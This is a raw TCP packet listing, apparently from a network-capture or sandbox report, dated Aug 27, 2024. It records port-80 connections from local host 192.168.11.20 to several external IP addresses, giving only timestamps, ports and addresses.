                                                                                  Aug 27, 2024 17:45:52.738555908 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.738647938 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.738672018 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.738724947 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.738830090 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.738881111 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.739020109 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.739130020 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.739171982 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.739270926 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.739288092 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.739300013 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.739506006 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.739507914 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.739648104 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.739689112 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.739795923 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.739809036 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.739830971 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.739921093 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.739969969 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.740024090 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.740036011 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.740180969 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.740287066 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.740298986 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.740468025 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.740504980 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.740629911 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.740636110 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.740804911 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.868350983 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.868444920 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.868539095 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.868587971 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.868602037 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.868628025 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.868657112 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.868797064 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.868850946 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.868864059 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.868911982 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.869024992 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.869082928 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.869196892 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.869404078 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.869587898 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.869640112 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.869738102 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.869818926 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.869844913 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.869929075 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.869940996 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.869941950 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.870138884 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.870138884 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.870265007 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.870307922 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.870412111 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.870480061 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.870517969 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.870570898 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.870673895 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.870675087 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.870685101 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.870783091 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.870794058 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.870805979 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.870868921 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.870893002 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.870939016 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.871001005 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.871130943 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.871136904 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.871262074 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.871273994 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.871315002 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.871387005 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.871480942 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.871514082 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.871531010 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.871566057 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.871611118 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.871684074 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.871783018 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.871833086 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.871923923 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.871934891 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.871947050 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.872041941 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.872054100 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.872153997 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.872165918 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.872184992 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.872299910 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.872392893 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.872400999 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.872585058 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.872771978 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.872895002 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.872951031 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.873054028 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.873059988 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.873071909 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.873167992 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.873250008 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.873270988 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.873325109 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.873339891 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.873442888 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.873442888 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.873455048 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.873536110 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.873550892 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.873563051 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.873588085 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.873652935 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.873658895 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.873744011 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.873776913 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.873823881 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.873861074 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.873893976 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.873925924 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.874030113 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.874066114 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.874077082 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.874092102 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.874157906 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.874250889 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.874273062 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.874303102 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.874330044 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.874341965 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.874352932 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.874407053 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.874449968 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.874460936 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.874521017 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.874536991 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.874576092 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.874588966 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.874680042 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.874680996 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.874692917 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.874792099 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.874803066 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.874861956 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.874893904 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.874911070 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.874991894 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.875024080 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.875070095 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.875180006 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.875200033 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.875298977 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.875317097 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.875418901 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.875431061 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.875439882 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.875499010 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.875590086 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:57.745621920 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:57.745942116 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:46:15.896316051 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:46:30.152175903 CEST4980780192.168.11.20154.23.184.218
                                                                                  Aug 27, 2024 17:46:30.453689098 CEST8049807154.23.184.218192.168.11.20
                                                                                  Aug 27, 2024 17:46:30.453866959 CEST4980780192.168.11.20154.23.184.218
                                                                                  Aug 27, 2024 17:46:30.460151911 CEST4980780192.168.11.20154.23.184.218
                                                                                  Aug 27, 2024 17:46:30.761688948 CEST8049807154.23.184.218192.168.11.20
                                                                                  Aug 27, 2024 17:46:30.761910915 CEST8049807154.23.184.218192.168.11.20
                                                                                  Aug 27, 2024 17:46:30.762151957 CEST4980780192.168.11.20154.23.184.218
                                                                                  Aug 27, 2024 17:46:30.764998913 CEST4980780192.168.11.20154.23.184.218
                                                                                  Aug 27, 2024 17:46:31.066409111 CEST8049807154.23.184.218192.168.11.20
                                                                                  Aug 27, 2024 17:46:51.005475044 CEST4980880192.168.11.2076.223.67.189
                                                                                  Aug 27, 2024 17:46:51.107215881 CEST804980876.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:51.107536077 CEST4980880192.168.11.2076.223.67.189
                                                                                  Aug 27, 2024 17:46:51.116849899 CEST4980880192.168.11.2076.223.67.189
                                                                                  Aug 27, 2024 17:46:51.218322992 CEST804980876.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:51.219928026 CEST804980876.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:51.220148087 CEST4980880192.168.11.2076.223.67.189
                                                                                  Aug 27, 2024 17:46:52.624102116 CEST4980880192.168.11.2076.223.67.189
                                                                                  Aug 27, 2024 17:46:52.725323915 CEST804980876.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:53.641864061 CEST4980980192.168.11.2076.223.67.189
                                                                                  Aug 27, 2024 17:46:53.743326902 CEST804980976.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:53.743549109 CEST4980980192.168.11.2076.223.67.189
                                                                                  Aug 27, 2024 17:46:53.751492023 CEST4980980192.168.11.2076.223.67.189
                                                                                  Aug 27, 2024 17:46:53.852788925 CEST804980976.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:53.854660988 CEST804980976.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:53.854859114 CEST4980980192.168.11.2076.223.67.189
                                                                                  Aug 27, 2024 17:46:55.264220953 CEST4980980192.168.11.2076.223.67.189
                                                                                  Aug 27, 2024 17:46:55.365356922 CEST804980976.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:56.281827927 CEST4981080192.168.11.2076.223.67.189
                                                                                  Aug 27, 2024 17:46:56.382597923 CEST804981076.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:56.382806063 CEST4981080192.168.11.2076.223.67.189
                                                                                  Aug 27, 2024 17:46:56.391618013 CEST4981080192.168.11.2076.223.67.189
                                                                                  Aug 27, 2024 17:46:56.391752005 CEST4981080192.168.11.2076.223.67.189
                                                                                  Aug 27, 2024 17:46:56.492432117 CEST804981076.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:56.492542982 CEST804981076.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:56.492655039 CEST804981076.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:56.492734909 CEST4981080192.168.11.2076.223.67.189
                                                                                  Aug 27, 2024 17:46:56.492772102 CEST804981076.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:56.492774010 CEST4981080192.168.11.2076.223.67.189
                                                                                  Aug 27, 2024 17:46:56.492786884 CEST804981076.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:56.492819071 CEST4981080192.168.11.2076.223.67.189
                                                                                  Aug 27, 2024 17:46:56.492856979 CEST804981076.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:56.492866039 CEST804981076.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:56.492991924 CEST4981080192.168.11.2076.223.67.189
                                                                                  Aug 27, 2024 17:46:56.493010044 CEST804981076.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:56.493146896 CEST804981076.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:56.493155956 CEST804981076.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:56.493161917 CEST4981080192.168.11.2076.223.67.189
                                                                                  Aug 27, 2024 17:46:56.493329048 CEST4981080192.168.11.2076.223.67.189
                                                                                  Aug 27, 2024 17:46:56.493531942 CEST4981080192.168.11.2076.223.67.189
                                                                                  Aug 27, 2024 17:46:56.494613886 CEST804981076.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:56.495021105 CEST4981080192.168.11.2076.223.67.189
                                                                                  Aug 27, 2024 17:46:56.593735933 CEST804981076.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:56.593816996 CEST804981076.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:56.593889952 CEST804981076.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:56.593945026 CEST4981080192.168.11.2076.223.67.189
                                                                                  Aug 27, 2024 17:46:56.594011068 CEST804981076.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:56.594078064 CEST804981076.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:56.594110012 CEST4981080192.168.11.2076.223.67.189
                                                                                  Aug 27, 2024 17:46:56.594175100 CEST804981076.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:56.594245911 CEST804981076.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:56.594257116 CEST4981080192.168.11.2076.223.67.189
                                                                                  Aug 27, 2024 17:46:56.594332933 CEST804981076.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:56.594374895 CEST804981076.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:56.594420910 CEST4981080192.168.11.2076.223.67.189
                                                                                  Aug 27, 2024 17:46:56.594481945 CEST804981076.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:56.594546080 CEST804981076.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:56.594619036 CEST804981076.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:56.594679117 CEST804981076.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:56.594741106 CEST804981076.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:56.594785929 CEST804981076.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:56.594991922 CEST804981076.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:56.595040083 CEST804981076.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:56.595079899 CEST804981076.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:56.595118999 CEST804981076.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:56.595159054 CEST804981076.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:56.695566893 CEST804981076.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:56.695754051 CEST804981076.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:56.695823908 CEST804981076.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:56.696003914 CEST804981076.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:56.696037054 CEST804981076.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:56.696067095 CEST804981076.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:56.696086884 CEST804981076.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:56.696204901 CEST804981076.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:56.696372986 CEST804981076.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:56.696451902 CEST804981076.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:56.696474075 CEST804981076.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:56.696635962 CEST804981076.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:57.904290915 CEST4981080192.168.11.2076.223.67.189
                                                                                  Aug 27, 2024 17:46:58.005050898 CEST804981076.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:58.921868086 CEST4981180192.168.11.2076.223.67.189
                                                                                  Aug 27, 2024 17:46:59.023089886 CEST804981176.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:59.023520947 CEST4981180192.168.11.2076.223.67.189
                                                                                  Aug 27, 2024 17:46:59.029607058 CEST4981180192.168.11.2076.223.67.189
                                                                                  Aug 27, 2024 17:46:59.130608082 CEST804981176.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:59.134354115 CEST804981176.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:59.134421110 CEST804981176.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:59.134782076 CEST4981180192.168.11.2076.223.67.189
                                                                                  Aug 27, 2024 17:46:59.136724949 CEST4981180192.168.11.2076.223.67.189
                                                                                  Aug 27, 2024 17:46:59.140681982 CEST804981176.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:46:59.140855074 CEST4981180192.168.11.2076.223.67.189
                                                                                  Aug 27, 2024 17:46:59.238187075 CEST804981176.223.67.189192.168.11.20
                                                                                  Aug 27, 2024 17:47:04.329796076 CEST4981280192.168.11.20203.161.42.73
                                                                                  Aug 27, 2024 17:47:04.494834900 CEST8049812203.161.42.73192.168.11.20
                                                                                  Aug 27, 2024 17:47:04.495079994 CEST4981280192.168.11.20203.161.42.73
                                                                                  Aug 27, 2024 17:47:04.502994061 CEST4981280192.168.11.20203.161.42.73
                                                                                  Aug 27, 2024 17:47:04.668010950 CEST8049812203.161.42.73192.168.11.20
                                                                                  Aug 27, 2024 17:47:04.678139925 CEST8049812203.161.42.73192.168.11.20
                                                                                  Aug 27, 2024 17:47:04.678248882 CEST8049812203.161.42.73192.168.11.20
                                                                                  Aug 27, 2024 17:47:04.678263903 CEST8049812203.161.42.73192.168.11.20
                                                                                  Aug 27, 2024 17:47:04.678479910 CEST8049812203.161.42.73192.168.11.20
                                                                                  Aug 27, 2024 17:47:04.678519011 CEST4981280192.168.11.20203.161.42.73
                                                                                  Aug 27, 2024 17:47:04.678580999 CEST8049812203.161.42.73192.168.11.20
                                                                                  Aug 27, 2024 17:47:04.678689003 CEST4981280192.168.11.20203.161.42.73
                                                                                  Aug 27, 2024 17:47:04.678716898 CEST8049812203.161.42.73192.168.11.20
                                                                                  Aug 27, 2024 17:47:04.678832054 CEST8049812203.161.42.73192.168.11.20
                                                                                  Aug 27, 2024 17:47:04.678900003 CEST8049812203.161.42.73192.168.11.20
                                                                                  Aug 27, 2024 17:47:04.678982973 CEST8049812203.161.42.73192.168.11.20
                                                                                  Aug 27, 2024 17:47:04.678996086 CEST4981280192.168.11.20203.161.42.73
                                                                                  Aug 27, 2024 17:47:04.679167032 CEST4981280192.168.11.20203.161.42.73
                                                                                  Aug 27, 2024 17:47:04.679176092 CEST8049812203.161.42.73192.168.11.20
                                                                                  Aug 27, 2024 17:47:04.679336071 CEST4981280192.168.11.20203.161.42.73
                                                                                  Aug 27, 2024 17:47:04.844007969 CEST8049812203.161.42.73192.168.11.20
                                                                                  Aug 27, 2024 17:47:04.844090939 CEST8049812203.161.42.73192.168.11.20
                                                                                  Aug 27, 2024 17:47:04.844204903 CEST8049812203.161.42.73192.168.11.20
                                                                                  Aug 27, 2024 17:47:04.844388008 CEST4981280192.168.11.20203.161.42.73
                                                                                  Aug 27, 2024 17:47:04.844388008 CEST4981280192.168.11.20203.161.42.73
                                                                                  Aug 27, 2024 17:47:06.011877060 CEST4981280192.168.11.20203.161.42.73
                                                                                  Aug 27, 2024 17:47:07.029437065 CEST4981380192.168.11.20203.161.42.73
                                                                                  Aug 27, 2024 17:47:07.196439981 CEST8049813203.161.42.73192.168.11.20
                                                                                  Aug 27, 2024 17:47:07.196657896 CEST4981380192.168.11.20203.161.42.73
                                                                                  Aug 27, 2024 17:47:07.204485893 CEST4981380192.168.11.20203.161.42.73
                                                                                  Aug 27, 2024 17:47:07.372793913 CEST8049813203.161.42.73192.168.11.20
                                                                                  Aug 27, 2024 17:47:07.385747910 CEST8049813203.161.42.73192.168.11.20
                                                                                  Aug 27, 2024 17:47:07.385869026 CEST8049813203.161.42.73192.168.11.20
                                                                                  Aug 27, 2024 17:47:07.385884047 CEST8049813203.161.42.73192.168.11.20
                                                                                  Aug 27, 2024 17:47:07.386014938 CEST8049813203.161.42.73192.168.11.20
                                                                                  Aug 27, 2024 17:47:07.386106968 CEST4981380192.168.11.20203.161.42.73
                                                                                  Aug 27, 2024 17:47:07.386125088 CEST8049813203.161.42.73192.168.11.20
                                                                                  Aug 27, 2024 17:47:07.386140108 CEST8049813203.161.42.73192.168.11.20
                                                                                  Aug 27, 2024 17:47:07.386253119 CEST8049813203.161.42.73192.168.11.20
                                                                                  Aug 27, 2024 17:47:07.386276007 CEST4981380192.168.11.20203.161.42.73
                                                                                  Aug 27, 2024 17:47:07.386360884 CEST8049813203.161.42.73192.168.11.20
                                                                                  Aug 27, 2024 17:47:07.386445999 CEST4981380192.168.11.20203.161.42.73
                                                                                  Aug 27, 2024 17:47:07.386451006 CEST8049813203.161.42.73192.168.11.20
                                                                                  Aug 27, 2024 17:47:07.386574030 CEST8049813203.161.42.73192.168.11.20
                                                                                  Aug 27, 2024 17:47:07.386615992 CEST4981380192.168.11.20203.161.42.73
                                                                                  Aug 27, 2024 17:47:07.386955976 CEST4981380192.168.11.20203.161.42.73
                                                                                  Aug 27, 2024 17:47:07.552975893 CEST8049813203.161.42.73192.168.11.20
                                                                                  Aug 27, 2024 17:47:07.553056002 CEST8049813203.161.42.73192.168.11.20
                                                                                  Aug 27, 2024 17:47:07.553105116 CEST8049813203.161.42.73192.168.11.20
                                                                                  Aug 27, 2024 17:47:07.553395033 CEST4981380192.168.11.20203.161.42.73
                                                                                  Aug 27, 2024 17:47:08.714374065 CEST4981380192.168.11.20203.161.42.73
                                                                                  Aug 27, 2024 17:47:09.732063055 CEST4981480192.168.11.20203.161.42.73
                                                                                  Aug 27, 2024 17:47:09.911547899 CEST8049814203.161.42.73192.168.11.20
                                                                                  Aug 27, 2024 17:47:09.911777973 CEST4981480192.168.11.20203.161.42.73
                                                                                  Aug 27, 2024 17:47:09.920603991 CEST4981480192.168.11.20203.161.42.73
                                                                                  Aug 27, 2024 17:47:09.920715094 CEST4981480192.168.11.20203.161.42.73
